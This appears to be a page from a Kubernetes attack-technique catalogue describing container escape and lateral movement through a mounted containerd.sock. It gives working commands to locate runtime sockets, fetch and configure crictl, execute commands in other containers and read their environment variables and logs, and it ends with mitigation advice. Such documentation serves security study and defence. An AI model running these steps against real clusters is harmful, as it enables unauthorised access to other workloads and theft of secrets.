Skip to content


Source Destination MITRE
Container Container Lateral Movement, TA0008

Container escape via the containerd.sock file that allows executing a binary into another container.


When the containerd.sock (or other equivalent - see the list below) is mounted inside a container, it allows the container to interact with container runtime. Therefore an attacker can execute any command in any container present in the cluster. This allows an attacker to do some lateral movement across the cluster.


Execution within a container process with the following unix socket being (or any parent directory) being mounted inside the container:


:rotating_light: sockets mounted as readonly can still be used for this attack. :rotating_light: This can be demonstrated as follows:

# Create an alpine container with the docker socket mounted as readonly
docker run -v /var/run/docker.sock:/var/run/docker.sock:ro --rm -it alpine sh

# Within the alpine container execute a docker command
docker ps

See the example pod spec.


Look for any socket being mounted in the container by running a simple find command:

find / -name dockershim.sock -o -name containerd.sock -o -name crio.sock -o -name cri-dockerd.sock  2>/dev/null


To exploit this vulnerability, we will use a CLI for Kubelet Container Runtime Interface (CRI) provided by Google for debugging purposes: crictl.

apt update && apt install -f wget tar
wget -O /tmp/crictl.tar.gz
tar xvf /tmp/crictl.tar.gz -C /tmp

This tools allows to interact with Kubernetes using a unix socket:


Once you have the path for the mounted socket, configure crictl to use it:

echo "runtime-endpoint: unix://${MOUNTED_SOCK_PATH}
image-endpoint: unix://${MOUNTED_SOCK_PATH}
debug: false" > /tmp/crictl.yaml && alias cc='/tmp/crictl --config /tmp/crictl.yaml'

Once everything is configured, you should be able to run command on another container of your choice.

To list all the pods:

cc ps -a

Executing a command on another pod:

cc exec -s 05c862f55a017 hostname


The -s is important otherwise, crictl will try to use the http endpoint to run the command, resulting in errors like:

FATA[0000] execing command in container: error sending request: Post "": dial tcp connect: connection refused

With crictl you can also access sensitive information: + crictl inspect: access env variable from any container + crictl logs: retrieve all the logs from any container


Implement security policies

Use a pod security policy or admission controller to prevent or limit the creation of pods with a hostPath mount for the following locations: